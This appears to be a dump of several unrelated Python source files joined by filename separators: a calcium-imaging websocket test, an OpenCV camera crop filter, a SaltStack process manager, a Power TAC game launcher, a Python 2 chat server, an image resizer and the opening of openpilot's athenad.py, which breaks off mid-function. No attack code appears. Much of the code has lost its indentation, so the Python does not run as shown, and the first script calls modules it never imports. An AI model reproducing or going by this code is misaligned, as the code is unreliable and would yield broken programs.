from datetime import datetime
from glob import glob
from pathlib import Path
import multiprocessing
import websockets
import time
import threading
ip = 'localhost'
port = 6000
init_folder = 'e:/caiman_scratch/ori_20210209_seed'
data_folder = 'e:/caiman_scratch/ori_20210209'
# init_folder = 'd:/Frankenrig/Experiments/i141_3/20210209/e3_init'
# init_folder = 'd:/Frankenrig/Experiments/w30_2/20210324/e2'
# data_folder = 'd:/Frankenrig/Experiments/i141_3/20210209/e3'
nplanes = 3
nchannels = 2
mm3d_path = glob(data_folder+'/*.mat')[0]
now = datetime.now()
output_folder = Path(f'e:/caiman_scratch/test_results/{now.strftime("%Y%m%d_%H_%M_%S")}')
output_folder.mkdir(exist_ok=True, parents=True)
# LOGFILE = folder + '/caiman/out/pipeline_test.log'
LOGFORMAT = '{relativeCreated:08.0f} - {levelname:8} - [{module}:{funcName}:{lineno}] - {message}'
# logging.basicConfig(level=logging.ERROR, format=LOGFORMAT, filename=LOGFILE, style='{')
logging.basicConfig(level=logging.ERROR, format=LOGFORMAT, style='{')
logger = logging.getLogger('live2p')
logger.setLevel(logging.DEBUG)
test_params_unseeded = {
'fr': 6.36,
'p': 1, # deconv 0 is off, 1 is slow, 2 is fast
    'nb': 2, # background components -> nb: 3 for complex
'decay_time': 1.0, # sensor tau
'gSig': (5, 5), # expected half size of neurons in pixels, very important for proper component detection
'init_method': 'bare',
'motion_correct': True,
'expected_comps': 750,
'update_num_comps': True,
'update_freq': 100,
'niter_rig': 2,
'pw_rigid': False,
'dist_shape_update': False,
'normalize': True,
'sniper_mode': True,
'test_both': True,
'ring_CNN': True,
'simultaneously': True,
'use_cuda': False,
}
test_params_seeded = {
'fr': 6.36,
'p': 1, # deconv 0 is off, 1 is slow, 2 is fast
    'nb': 2, # background components -> nb: 3 for complex
'decay_time': 1.0, # sensor tau
'gSig': (7, 7), # expected half size of neurons in pixels, very important for proper component detection
'init_method': 'seeded',
'motion_correct': True,
'expected_comps': 300,
'update_num_comps': False,
'update_freq': 100,
'niter_rig': 2,
'pw_rigid': False,
'dist_shape_update': False,
'normalize': True,
'sniper_mode': False,
'test_both': False,
'ring_CNN': False,
'simultaneously': True,
'use_cuda': False,
}
test_params_seeded_add = {
'fr': 6.36,
'p': 1, # deconv 0 is off, 1 is slow, 2 is fast
    'nb': 2, # background components -> nb: 3 for complex
'decay_time': 1.0, # sensor tau
'gSig': (7, 7), # expected half size of neurons in pixels, very important for proper component detection
'init_method': 'seeded',
'motion_correct': True,
'expected_comps': 600,
'update_num_comps': True,
'update_freq': 100,
'niter_rig': 2,
'pw_rigid': False,
'dist_shape_update': False,
'normalize': True,
'sniper_mode': False,
'test_both': False,
'ring_CNN': False,
'simultaneously': True,
'use_cuda': False,
}
server_settings = {
'ip': ip,
'port': port,
'output_folder': str(output_folder),
'Ain_path': mm3d_path,
'use_prev_init': False,
'xslice': slice(110,512-110),
'use_init_gui': False
}
def test_run_server():
start_live2p(params_dict=test_params_seeded, debug_level=1, **server_settings)
def test_send_setup():
async def send():
#setup
async with websockets.connect(f'ws://{ip}:{port}') as websocket:
out = {
'EVENTTYPE':'SETUP',
'nchannels': nchannels,
'nplanes': nplanes,
'fr': 6.36,
'folder': init_folder
}
await websocket.send(json.dumps(out))
out = {'EVENTTYPE':'START'}
await websocket.send(json.dumps(out))
asyncio.get_event_loop().run_until_complete(send())
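# Event protocol implied by these tests: each websocket message is a JSON
# dict whose 'EVENTTYPE' drives the server:
#   SETUP -> START -> ACQDONE (one per tiff) -> SESSIONDONE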
def test_send_data(rate):
async def send():
async with websockets.connect(f'ws://{ip}:{port}') as websocket:
all_tiffs = Path(data_folder).glob('*.tif*')
for f in all_tiffs:
print(f'Sent tiff {f}')
out = {
'EVENTTYPE':'ACQDONE',
'filename': str(f)
}
out = json.dumps(out)
await websocket.send(out)
await asyncio.sleep(rate)
# stop
out = {
'EVENTTYPE': 'SESSIONDONE'
}
await websocket.send(json.dumps(out))
asyncio.get_event_loop().run_until_complete(send())
now = datetime.now()
current_time = now.strftime("%H:%M:%S")
print('Last frame (a stop frame) sent at: ', current_time)
def main():
# srv = multiprocessing.Process(target=test_run_server)
# srv = threading.Thread(target=test_run_server)
# srv.start()
# time.sleep(20)
# test_send_setup()
# time.sleep(120)
# test_send_data(1)
# srv.join()
# srv.close()
test_run_server()
if __name__ == '__main__':
main() |
camera_filter.py | """Filters a video stream.
Class CameraFilter - Crops, rotates and scales a videostream
Functions in CameraFilter:
__init__(self) - Initialize variables
update(self, camera_yaw , camera_pitch, camera_zoom) - Updates variables
stop(self) - Stops the camera filter
start(self) - Starts the camera filter
handle_frame(self, frame, frame_width, frame_height,
out_width, out_height) - Crops and resizes a frame.
"""
import threading
import cv2
from .log import logger
from .io import output_adapter
from . import config
# pylint: disable=no-member
# error with import cv2
# pylint: disable=too-many-instance-attributes
# pylint: disable=too-many-arguments
# handle_frame need 6 arguments
class CameraFilter:
"""Filters a video stream.
    This filter rotates and crops a video stream according to
    a pitch, a yaw and a zoom variable. The video stream comes from
    a 180+ degree camera pointing straight down. To mimic a gimbal
    camera, the pitch, yaw and zoom variables are the angle,
    rotation and zoom needed to look at a specific portion of
    the 180+ degree video stream.
    The pitch, yaw and zoom variables are updated asynchronously
    through the update function.
Functions in the class:
__init__(self) - Initialize variables
    update(self, camera_yaw, camera_pitch, camera_zoom)
- Updates variables
stop(self) - Stops the camera filter
start(self) - Starts the camera filter
main(self) - Main loop of the camerafilter
handle_frame(self, frame, frame_width, frame_height,
out_width, out_height)
- Crops and resizes a frame.
"""
def __init__(self, pipeline):
"""Initializes the Camerafilter.
Sets some default starting values
Initializes and starts the CameraFilter thread.
"""
self.pipeline = pipeline
# Init thread
self.semaphore = threading.Semaphore()
self.thread = threading.Thread(target=self.main)
# Set Defaults
self.camera_yaw , self.camera_pitch, self.camera_zoom,\
self.camera_roll = 0,0,4,0
self.stopped = False
self.camera_input = 0
        # Get output adapter
self.output_adapter = output_adapter.OutputAdapter()
def update(self, camera_yaw , camera_pitch, camera_zoom, camera_roll=0):
"""Updates the cropping values of the CameraFilter."""
self.semaphore.acquire()
self.camera_yaw = camera_yaw
self.camera_pitch = camera_pitch
self.camera_zoom = camera_zoom
self.camera_roll = camera_roll
self.semaphore.release()
def stop(self):
"""Stops the Camerafilter."""
self.stopped = True
self.thread.join()
def start(self, camera_input=0):
"""Starts the Camerafilter."""
# Set defaults
self.camera_yaw, self.camera_pitch, self.camera_zoom,\
self.camera_roll = 0,0,4,0
self.stopped = False
self.camera_input = camera_input
self.thread.start()
def main(self):
"""The main function of the class.
        Takes the input video stream,
        crops and rotates it according to camera_yaw,
        camera_pitch and camera_zoom,
        and outputs the processed video stream.
"""
cap = cv2.VideoCapture(self.camera_input if self.camera_input
else config.CONFIG['cam_input'])
cap.set(cv2.CAP_PROP_BUFFERSIZE, 2)
if not cap.isOpened():
logger.error("no camera")
raise ValueError("No camera")
cnt = 0 # Initialize frame counter
# Some characteristics from the original video
frame_width = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
frame_height = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
# Getting width and height of output from config file
width = config.CONFIG['cam_width']
height = config.CONFIG['cam_height']
while not self.stopped:
            ret, frame = cap.read() # Capture frames one by one
cnt += 1 # Counting the frames
# Avoid problems when video finish
if not ret:
break
            self.semaphore.acquire()  # lock camera params while processing
final_frame = self.handle_frame(frame, frame_width,
frame_height, width, height)
try:
self.output_adapter.send(final_frame)
cv2.waitKey(1)
except KeyboardInterrupt:
logger.info("stopped due to KeyboardInterrupt")
self.stopped = True
self.semaphore.release()
cap.release()
cv2.destroyAllWindows()
def handle_frame(self, frame, frame_width, frame_height,
out_width, out_height):
"""Handles the frame.
        Takes a frame, the width and height of the frame,
        and the width and height of the cropped frame as input.
        The function builds a rotation matrix, rotates the frame,
        and then crops it. It returns a cropped, resized frame.
"""
matrix = cv2.getRotationMatrix2D((frame_width/2, frame_height/2),
self.camera_yaw , 1)
# Apply rotation matrix
rotated_frame = cv2.warpAffine(frame, matrix,
(frame_width, frame_height))
relative_pitch = (frame_height/2 -\
(out_height/2)/self.camera_zoom)*self.camera_pitch
matrix_roll = cv2.getRotationMatrix2D((frame_width/2,
frame_height/2 - relative_pitch), self.camera_roll, 1)
rotated_frame = cv2.warpAffine(rotated_frame, matrix_roll,
(frame_width,frame_height))
# Crop the frame
crop_frame = cv2.getRectSubPix(rotated_frame,
(int(out_width/self.camera_zoom),
int(out_height/self.camera_zoom)),
(frame_width/2, frame_height/2
- relative_pitch))
# Resize the frame
return cv2.resize(crop_frame, (out_width,out_height))
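    # Worked example of the crop math above (hypothetical numbers): with a
    # 1920x1080 input, a 640x480 output, camera_zoom=4 and camera_pitch=1.0:
    #   relative_pitch = (1080/2 - (480/2)/4) * 1.0 = 480 px
    #   crop size      = (640/4, 480/4) = (160, 120)
    # and the 160x120 crop is resized back up to 640x480.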
|
process.py | # -*- coding: utf-8 -*-
# Import python libs
from __future__ import absolute_import
import os
import sys
import time
import signal
import logging
import multiprocessing
import threading
# Import salt libs
import salt.defaults.exitcodes
import salt.utils
# Import 3rd-party libs
import salt.ext.six as six
from salt.ext.six.moves import queue, range # pylint: disable=import-error,redefined-builtin
log = logging.getLogger(__name__)
# pylint: disable=import-error
HAS_PSUTIL = False
try:
import psutil
HAS_PSUTIL = True
except ImportError:
pass
def notify_systemd():
'''
Notify systemd that this process has started
'''
try:
import systemd.daemon
except ImportError:
return False
if systemd.daemon.booted():
try:
return systemd.daemon.notify('READY=1')
except SystemError:
# Daemon was not started by systemd
pass
def set_pidfile(pidfile, user):
'''
Save the pidfile
'''
pdir = os.path.dirname(pidfile)
if not os.path.isdir(pdir) and pdir:
os.makedirs(pdir)
try:
with salt.utils.fopen(pidfile, 'w+') as ofile:
ofile.write(str(os.getpid()))
except IOError:
pass
log.debug(('Created pidfile: {0}').format(pidfile))
if salt.utils.is_windows():
return True
import pwd # after confirming not running Windows
#import grp
try:
pwnam = pwd.getpwnam(user)
uid = pwnam[2]
gid = pwnam[3]
#groups = [g.gr_gid for g in grp.getgrall() if user in g.gr_mem]
    except KeyError:
sys.stderr.write(
'Failed to set the pid to user: {0}. The user is not '
'available.\n'.format(
user
)
)
sys.exit(salt.defaults.exitcodes.EX_NOUSER)
if os.getuid() == uid:
# The current user already owns the pidfile. Return!
return
try:
os.chown(pidfile, uid, gid)
except OSError as err:
msg = (
'Failed to set the ownership of PID file {0} to user {1}.'.format(
pidfile, user
)
)
log.debug('{0} Traceback follows:\n'.format(msg), exc_info=True)
sys.stderr.write('{0}\n'.format(msg))
sys.exit(err.errno)
log.debug('Chowned pidfile: {0} to user: {1}'.format(pidfile, user))
def clean_proc(proc, wait_for_kill=10):
'''
Generic method for cleaning up multiprocessing procs
'''
# NoneType and other fun stuff need not apply
if not proc:
return
try:
waited = 0
while proc.is_alive():
proc.terminate()
waited += 1
time.sleep(0.1)
if proc.is_alive() and (waited >= wait_for_kill):
log.error(
'Process did not die with terminate(): {0}'.format(
proc.pid
)
)
os.kill(proc.pid, signal.SIGKILL)
except (AssertionError, AttributeError):
# Catch AssertionError when the proc is evaluated inside the child
# Catch AttributeError when the process dies between proc.is_alive()
# and proc.terminate() and turns into a NoneType
pass
def os_is_running(pid):
'''
Use OS facilities to determine if a process is running
'''
if HAS_PSUTIL:
return psutil.pid_exists(pid)
else:
try:
os.kill(pid, 0) # SIG 0 is the "are you alive?" signal
return True
except OSError:
return False
class ThreadPool(object):
'''
This is a very VERY basic threadpool implementation
This was made instead of using multiprocessing ThreadPool because
we want to set max queue size and we want to daemonize threads (neither
is exposed in the stdlib version).
    Since there isn't much use for this class right now, this implementation
    only supports daemonized threads and will *not* return results.
TODO: if this is found to be more generally useful it would be nice to pull
in the majority of code from upstream or from http://bit.ly/1wTeJtM
'''
def __init__(self,
num_threads=None,
queue_size=0):
# if no count passed, default to number of CPUs
if num_threads is None:
num_threads = multiprocessing.cpu_count()
self.num_threads = num_threads
# create a task queue of queue_size
self._job_queue = queue.Queue(queue_size)
self._workers = []
# create worker threads
for _ in range(num_threads):
thread = threading.Thread(target=self._thread_target)
thread.daemon = True
thread.start()
self._workers.append(thread)
# intentionally not called "apply_async" since we aren't keeping track of
# the return at all, if we want to make this API compatible with multiprocessing
# threadpool we can in the future, and we won't have to worry about name collision
def fire_async(self, func, args=None, kwargs=None):
if args is None:
args = []
if kwargs is None:
kwargs = {}
try:
self._job_queue.put_nowait((func, args, kwargs))
return True
except queue.Full:
return False
def _thread_target(self):
while True:
# 1s timeout so that if the parent dies this thread will die within 1s
try:
func, args, kwargs = self._job_queue.get(timeout=1)
self._job_queue.task_done() # Mark the task as done once we get it
except queue.Empty:
continue
try:
log.debug('ThreadPool executing func: {0} with args:{1}'
' kwargs{2}'.format(func, args, kwargs))
func(*args, **kwargs)
except Exception as err:
log.debug(err, exc_info=True)
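# Minimal ThreadPool usage sketch ('some_func' is a placeholder):
#   pool = ThreadPool(num_threads=4, queue_size=100)
#   accepted = pool.fire_async(some_func, args=[1, 2])  # False if queue full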
class ProcessManager(object):
'''
A class which will manage processes that should be running
'''
def __init__(self, name=None, wait_for_kill=1):
# pid -> {tgt: foo, Process: object, args: args, kwargs: kwargs}
self._process_map = {}
self.name = name
if self.name is None:
self.name = self.__class__.__name__
self.wait_for_kill = wait_for_kill
# store some pointers for the SIGTERM handler
self._pid = os.getpid()
self._sigterm_handler = signal.getsignal(signal.SIGTERM)
def add_process(self, tgt, args=None, kwargs=None):
'''
        Create a process from tgt with args + kwargs.
        This will determine if tgt is a Process subclass; otherwise it
        assumes it is a function.
'''
if args is None:
args = []
if kwargs is None:
kwargs = {}
if type(multiprocessing.Process) is type(tgt) and issubclass(tgt, multiprocessing.Process):
process = tgt(*args, **kwargs)
else:
process = multiprocessing.Process(target=tgt, args=args, kwargs=kwargs)
process.start()
log.debug("Started '{0}' with pid {1}".format(tgt.__name__, process.pid))
self._process_map[process.pid] = {'tgt': tgt,
'args': args,
'kwargs': kwargs,
'Process': process}
def restart_process(self, pid):
'''
Create new process (assuming this one is dead), then remove the old one
'''
log.info('Process {0} ({1}) died with exit status {2},'
' restarting...'.format(self._process_map[pid]['tgt'],
pid,
self._process_map[pid]['Process'].exitcode))
# don't block, the process is already dead
self._process_map[pid]['Process'].join(1)
self.add_process(self._process_map[pid]['tgt'],
self._process_map[pid]['args'],
self._process_map[pid]['kwargs'])
del self._process_map[pid]
def run(self):
'''
Load and start all available api modules
'''
salt.utils.appendproctitle(self.name)
# make sure to kill the subprocesses if the parent is killed
signal.signal(signal.SIGTERM, self.kill_children)
while True:
try:
# in case someone died while we were waiting...
self.check_children()
pid, exit_status = os.wait()
if pid not in self._process_map:
log.debug(('Process of pid {0} died, not a known'
' process, will not restart').format(pid))
continue
self.restart_process(pid)
# OSError is raised if a signal handler is called (SIGTERM) during os.wait
except OSError:
break
def check_children(self):
'''
Check the children once
'''
        # iterate over a copy: restart_process() mutates _process_map
        for pid, mapping in six.iteritems(self._process_map.copy()):
if not mapping['Process'].is_alive():
self.restart_process(pid)
def kill_children(self, *args):
'''
Kill all of the children
'''
# check that this is the correct process, children inherit this
# handler, if we are in a child lets just run the original handler
if os.getpid() != self._pid:
if callable(self._sigterm_handler):
return self._sigterm_handler(*args)
elif self._sigterm_handler is not None:
return signal.default_int_handler(signal.SIGTERM)(*args)
else:
return
for p_map in six.itervalues(self._process_map):
p_map['Process'].terminate()
end_time = time.time() + self.wait_for_kill # when to die
while self._process_map and time.time() < end_time:
for pid, p_map in six.iteritems(self._process_map.copy()):
p_map['Process'].join(0)
# This is a race condition if a signal was passed to all children
try:
del self._process_map[pid]
except KeyError:
pass
        # SIGKILL anything still alive after the grace period
        for pid in self._process_map:
            try:
                os.kill(pid, signal.SIGKILL)
# in case the process has since decided to die, os.kill returns OSError
except OSError:
pass
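# Minimal ProcessManager usage sketch ('worker' is a placeholder function):
#   pm = ProcessManager(name='example-manager')
#   pm.add_process(worker)
#   pm.run()  # blocks; dead children are restarted, SIGTERM kills them all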
|
runGame.py | import os
import threading
from time import sleep
PATH_SERVER = "server"
AGENTS = "default-broker,TUC_TAC,DiCaprio"
# Key: Agent's name. Value: [Agent's path, Binaries]
# AGENT_INFO = {"TUC_TAC": ["brokers/TUC_TAC", "TUC_TAC_2020.jar"],
# "DiCaprio": ["brokers/DiCaprio", "DiCaprio-1.7.0.jar"],
# }
AGENT_INFO = {"DiCaprio": ["brokers/DiCaprio", "DiCaprio-1.7.0.jar"]
}
SERVER_BOOT_TIME = 10
def run_bootstrap(game_name):
return_value = os.system("cd " + PATH_SERVER + " && mvn -Pcli -Dexec.args=\"--boot " + game_name + " --game-id " + game_name + "\"")
print(f"Bootstrap for {game_name} thread returned {return_value}")
def run_game(game_name):
return_value = os.system("cd " + PATH_SERVER + " && mvn -X -Pcli -Dexec.args=\"--sim --boot-data " + game_name + " --game-id " + game_name + " --brokers " + AGENTS + "\"")
print(f"Run game for {game_name} thread returned {return_value}")
def run_agent(agent_name):
sleep(SERVER_BOOT_TIME)
return_value = os.system(f"java -jar {AGENT_INFO[agent_name][0]}/{AGENT_INFO[agent_name][1]}")
print(f"{agent_name} thread returned {return_value}")
def run_game_and_agents(game_name):
game = threading.Thread(target=run_game, args=(game_name,))
threads = [threading.Thread(target=run_agent, args=(agent_name,)) for agent_name in AGENT_INFO.keys()]
threads.append(game)
for thread in threads:
thread.start()
# game_name = "bootstrap"
# # run_bootstrap(game_name)
# run_game_and_agents(game_name)
# run_agent("DiCaprio") |
server4.py | import socket
import sys
import time
from thread import *
import threading
port = 6003
clients = []
here = {}
guest_cnt = -1
shutdown = False
help_mess = "type /p for getting all the people connected to the server\n" \
"type /m [NAME] for sending a message to a certain user\n" \
"type anything without a forward slash (/) to send a message to every user!\n" \
"type /q to quit and leave us :("
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind(('', port))
except socket.error, msg:
print("Bind failed. Error Code: " + str(msg[0]) + " Message: " + msg[1])
sys.exit()
# while 1:
# try:
# s3.connect(('127.0.0.1', 6002))
# break
# except:
# continue
# finally:
# break
s.listen(10)
print "Listening"
s3, ip = s.accept()
def receive_server3():
while 1:
try:
data = s3.recv(2048)
if data == "":
print "I'm there!"
break
else:
recv_not(data, s3)
except:
break
def client_thread(c):
global s3
c.sendall("Welcome!\nType y to enter your name or n to have an auto generated name.")
try:
data = c.recv(1024)
data = data.strip(' \t\n\r')
serv_name(data, c)
except:
print "someone left prematurely"
c.close()
return
for client in here.values():
if not client == c:
client.sendall("2")
serv_people(c)
temp_name = get_name(c)
for client in here.values():
client.sendall("0 " + time.ctime(time.time()) + " : " + "SERVER" + "-> " + temp_name + " has joined")
while True:
try:
mess = c.recv(2048)
if mess == "/q":
parse(mess, c)
notify("quit", temp_name, "", "", 0, s3)
for client in here.values():
client.sendall("2")
serv_shout(temp_name + " has disconnected.", None, 1)
break
parse(mess, c)
except:
try:
del clients[clients.index(temp_name)]
here.pop(temp_name) # notify
notify("quit", temp_name, "", "", 0, s3)
print temp_name + " Disconnected"
serv_shout(temp_name + " has disconnected.", None, 1)
for client in here.values():
client.sendall("2")
except:
notify("quit", temp_name, "", "", 0, s3)
for client in here.values():
client.sendall("2")
print temp_name + " Disconnected"
serv_shout(temp_name + " has disconnected.", None, 1)
break
# c.close()
def Main():
t = threading.Thread(target=receive_server3, args=())
t.start()
while 1:
# start_new_thread(server_thread(), )
c, addr = s.accept()
# print "I'm here!"
print "Connected to: " + str(addr)
start_new_thread(client_thread, (c,))
def serv_name(data, c):
global guest_cnt
global s3
if data == "y" or data == "Y":
while True:
c.sendall("Enter your name: ")
name = c.recv(2048)
flag = 0
for i in clients:
if name == i:
flag = 1
break
if flag:
c.sendall("This name is already used!\n")
else:
clients.append(name)
here[name] = c
notify("join", name, "", "", 0, s3)
break
else:
guest_cnt += 1
name = "guest" + str(guest_cnt)
clients.append(name)
here[name] = c
notify("join", name, "", "", 0, s3)
notify("guest", str(guest_cnt), "", "", 0, s3)
def recv_not(mess, y): # spaghetti
global guest_cnt
global here
global clients
mess_list = mess.split(" ", 4)
if mess_list[0] == "join":
clients.append(mess_list[4])
for client in here.values():
client.sendall("2")
client.sendall("0 " + time.ctime(time.time()) + " : " + "SERVER" + "-> " + mess_list[4] + " has joined")
elif mess_list[0] == "guest":
guest_cnt = int(mess_list[4])
elif mess_list[0] == "quit":
try:
del clients[clients.index(mess_list[4])]
except:
print ""
for client in here.values():
client.sendall("2")
elif mess_list[0] == "shout":
for client in here.values():
client.sendall(mess_list[4])
elif mess_list[0] == "whisper":
if mess_list[2] in here.keys():
here[mess_list[2]].sendall(mess_list[4])
notify("sent", mess_list[4], "", mess_list[1], 0, y)
else:
notify("404", mess_list[4], mess_list[2], mess_list[1], mess_list[3], y)
elif mess_list[0] == "sent":
here[mess_list[1]].sendall(mess_list[4])
elif mess_list[0] == "404":
here[mess_list[1]].sendall("0 " + time.ctime(time.time()) + " : " + "SERVER" + "-> " +
"This name does not exist.")
def notify(comm, mess, name, sender, d, y):
try:
y.sendall(comm + " " + sender + " " + name + " " + str(d) + " " + mess)
except:
sys.exit(0)
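# Inter-server wire format used by notify()/recv_not(): five space-separated
# fields, "<command> <sender> <name> <flag> <message>"; recv_not() splits on
# the first four spaces, so only <message> may itself contain spaces.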
def parse(mess, c):
command = mess[0:2]
if command == "/p":
serv_people(c)
elif command == "/m":
serv_private(mess, c)
elif command == "/q":
serv_quit(c)
elif command == "/h":
serv_help(c)
else:
serv_shout(mess, c, 0)
def serv_shout(mess, c, f):
if f == 0:
mod = "0 " + time.ctime(time.time()) + " : " + get_name(c) + " -> " + mess
for client in here.values():
client.sendall(mod)
notify("shout", mod, "", "", 0, s3)
else:
mod = "0 " + time.ctime(time.time()) + " : " + "SERVER" + " -> " + mess
for client in here.values():
client.sendall(mod)
notify("shout", mod, "", "", 0, s3)
def serv_people(c):
peeps = ""
for name in clients:
peeps += name
peeps += "\n"
c.sendall(peeps)
def serv_help(c):
c.sendall(help_mess)
def serv_private(mess, c):
name = get_name(c)
mess_list = mess.split(" ", 2)
mod = "1 " + time.ctime(time.time()) + " : " + name + "-> " + mess_list[2]
if mess_list[1] in here.keys():
here[mess_list[1]].sendall(mod)
c.sendall(mod)
else:
notify("whisper", mod, mess_list[1], name, 1, s3) # TODO 4
def serv_quit(c):
temp_name = get_name(c)
print str(temp_name) + " has disconnected."
del clients[clients.index(temp_name)]
here.pop(temp_name)
c.close()
def get_name(c):
for key in here.keys():
if here[key] == c:
return key
if __name__ == '__main__':
Main()
|
resize.py | import os
import sys
import logging
import argparse
from tqdm import tqdm
import multiprocessing
from multiprocessing import Queue, Pool, Process
from PIL import Image
from PIL import ImageFile
ImageFile.LOAD_TRUNCATED_IMAGES = True
logger = logging.getLogger("ImageResizer")
logger.setLevel(logging.INFO)
formatter = logging.Formatter(fmt='%(asctime)s %(message)s', datefmt='%m/%d/%Y %I:%M:%S')
handler = logging.FileHandler('log.resize.txt', mode="w")
handler.setFormatter(formatter)
logger.addHandler(handler)
def resize_image(images, image_dir, output_dir, size):
for image in images:
image_path = os.path.join(image_dir, image)
if not os.path.exists(image_path):
continue
with open(image_path, 'r+b') as f:
#with Image.open(f) as img:
try:
img = Image.open(f)
except OSError as e:
print(e)
continue
img = img.resize([size, size], Image.ANTIALIAS)
try:
img.save(os.path.join(output_dir, image), img.format)
            except OSError:
                # e.g. "cannot write mode RGBA as JPEG" -- convert and retry
                img = img.convert('RGB')
                img.save(os.path.join(output_dir, image), img.format)
finally:
logger.info(f'> {image} processed')
def main(args):
sample_file = args.sample_file
input_dir = args.input_dir
output_dir = args.output_dir
size = args.image_size
if not os.path.exists(output_dir):
os.makedirs(args.output_dir)
image_set = set(os.listdir(output_dir))
train_set = set([line.strip().split('\t')[0].split('/')[-1] for line in open(sample_file)])
images = list(train_set - image_set)
print(f'train_set - image_set -> {len(images)}')
n = 70000
image_lists = [images[i:i + n] for i in range(0, len(images), n)]
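    # e.g. with 150000 pending images and n = 70000 this yields chunks of
    # 70000, 70000 and 10000 images, and one worker process per chunk.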
for i, image_list in enumerate(image_lists):
print(f'list-{i} -> {len(image_list)}')
processes = []
for image_list in image_lists:
process = Process(target=resize_image, args=(image_list, input_dir, output_dir, size,))
process.start()
processes.append(process)
for process in processes:
process.join()
    logger.info('Resize done!')
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--sample-file', type=str, help='train data file')
parser.add_argument('--input-dir', type=str,
help='directory for source images')
parser.add_argument('--output-dir', type=str, default='./resized',
help='directory for saving resized images')
parser.add_argument('--image-size', type=int, default=256, # for cropping purpose
help='size for image after processing')
args = parser.parse_args()
main(args)
|
athenad.py | #!/usr/bin/env python3
import base64
import hashlib
import io
import json
import os
import sys
import queue
import random
import select
import socket
import threading
import time
from collections import namedtuple
from functools import partial
from typing import Any
import requests
from jsonrpc import JSONRPCResponseManager, dispatcher
from websocket import ABNF, WebSocketTimeoutException, WebSocketException, create_connection
import cereal.messaging as messaging
from cereal.services import service_list
from common.api import Api
from common.file_helpers import CallbackReader
from common.basedir import PERSIST
from common.params import Params
from common.realtime import sec_since_boot
from selfdrive.hardware import HARDWARE, PC
from selfdrive.loggerd.config import ROOT
from selfdrive.loggerd.xattr_cache import getxattr, setxattr
from selfdrive.swaglog import cloudlog, SWAGLOG_DIR
from selfdrive.version import get_version, get_origin, get_short_branch, get_commit
ATHENA_HOST = os.getenv('ATHENA_HOST', 'wss://athena.comma.ai')
HANDLER_THREADS = int(os.getenv('HANDLER_THREADS', "4"))
LOCAL_PORT_WHITELIST = {8022}
LOG_ATTR_NAME = 'user.upload'
LOG_ATTR_VALUE_MAX_UNIX_TIME = int.to_bytes(2147483647, 4, sys.byteorder)
RECONNECT_TIMEOUT_S = 70
RETRY_DELAY = 10 # seconds
MAX_RETRY_COUNT = 30 # Try for at most 5 minutes if upload fails immediately
WS_FRAME_SIZE = 4096
dispatcher["echo"] = lambda s: s
recv_queue: Any = queue.Queue()
send_queue: Any = queue.Queue()
upload_queue: Any = queue.Queue()
log_send_queue: Any = queue.Queue()
log_recv_queue: Any = queue.Queue()
cancelled_uploads: Any = set()
UploadItem = namedtuple('UploadItem', ['path', 'url', 'headers', 'created_at', 'id', 'retry_count', 'current', 'progress'], defaults=(0, False, 0))
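# Illustrative sketch (not used elsewhere): namedtuple defaults bind to the
# rightmost fields, so retry_count, current and progress default to (0, False, 0)
# while path, url, headers, created_at and id must be supplied.
def _upload_item_defaults_demo():
  item = UploadItem(path="/tmp/demo", url="https://example.com", headers={}, created_at=0, id="demo")
  assert (item.retry_count, item.current, item.progress) == (0, False, 0)
  return item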
cur_upload_items = {}
class UploadQueueCache():
params = Params()
@staticmethod
def initialize(upload_queue):
try:
upload_queue_json = UploadQueueCache.params.get("AthenadUploadQueue")
if upload_queue_json is not None:
for item in json.loads(upload_queue_json):
upload_queue.put(UploadItem(**item))
except Exception:
cloudlog.exception("athena.UploadQueueCache.initialize.exception")
@staticmethod
def cache(upload_queue):
try:
items = [i._asdict() for i in upload_queue.queue if i.id not in cancelled_uploads]
UploadQueueCache.params.put("AthenadUploadQueue", json.dumps(items))
except Exception:
cloudlog.exception("athena.UploadQueueCache.cache.exception")
def handle_long_poll(ws):
end_event = threading.Event()
threads = [
threading.Thread(target=ws_recv, args=(ws, end_event), name='ws_recv'),
threading.Thread(target=ws_send, args=(ws, end_event), name='ws_send'),
threading.Thread(target=upload_handler, args=(end_event,), name='upload_handler'),
threading.Thread(target=log_handler, args=(end_event,), name='log_handler'),
] + [
threading.Thread(target=jsonrpc_handler, args=(end_event,), name=f'worker_{x}')
for x in range(HANDLER_THREADS)
]
for thread in threads:
thread.start()
try:
while not end_event.is_set():
time.sleep(0.1)
except (KeyboardInterrupt, SystemExit):
end_event.set()
raise
finally:
for thread in threads:
cloudlog.debug(f"athena.joining {thread.name}")
thread.join()
def jsonrpc_handler(end_event):
dispatcher["startLocalProxy"] = partial(startLocalProxy, end_event)
while not end_event.is_set():
try:
data = recv_queue.get(timeout=1)
if "method" in data:
cloudlog.debug(f"athena.jsonrpc_handler.call_method {data}")
response = JSONRPCResponseManager.handle(data, dispatcher)
send_queue.put_nowait(response.json)
elif "id" in data and ("result" in data or "error" in data):
log_recv_queue.put_nowait(data)
else:
raise Exception("not a valid request or response")
except queue.Empty:
pass
except Exception as e:
cloudlog.exception("athena jsonrpc handler failed")
send_queue.put_nowait(json.dumps({"error": str(e)}))
def upload_handler(end_event):
tid = threading.get_ident()
while not end_event.is_set():
cur_upload_items[tid] = None
try:
cur_upload_items[tid] = upload_queue.get(timeout=1)._replace(current=True)
if cur_upload_items[tid].id in cancelled_uploads:
cancelled_uploads.remove(cur_upload_items[tid].id)
continue
try:
def cb(sz, cur):
cur_upload_items[tid] = cur_upload_items[tid]._replace(progress=cur / sz if sz else 1)
_do_upload(cur_upload_items[tid], cb)
UploadQueueCache.cache(upload_queue)
except (requests.exceptions.Timeout, requests.exceptions.ConnectionError, requests.exceptions.SSLError) as e:
cloudlog.warning(f"athena.upload_handler.retry {e} {cur_upload_items[tid]}")
if cur_upload_items[tid].retry_count < MAX_RETRY_COUNT:
item = cur_upload_items[tid]
item = item._replace(
retry_count=item.retry_count + 1,
progress=0,
current=False
)
upload_queue.put_nowait(item)
UploadQueueCache.cache(upload_queue)
cur_upload_items[tid] = None
for _ in range(RETRY_DELAY):
time.sleep(1)
if end_event.is_set():
break
except queue.Empty:
pass
except Exception:
cloudlog.exception("athena.upload_handler.exception")
def _do_upload(upload_item, callback=None):
with open(upload_item.path, "rb") as f:
size = os.fstat(f.fileno()).st_size
if callback:
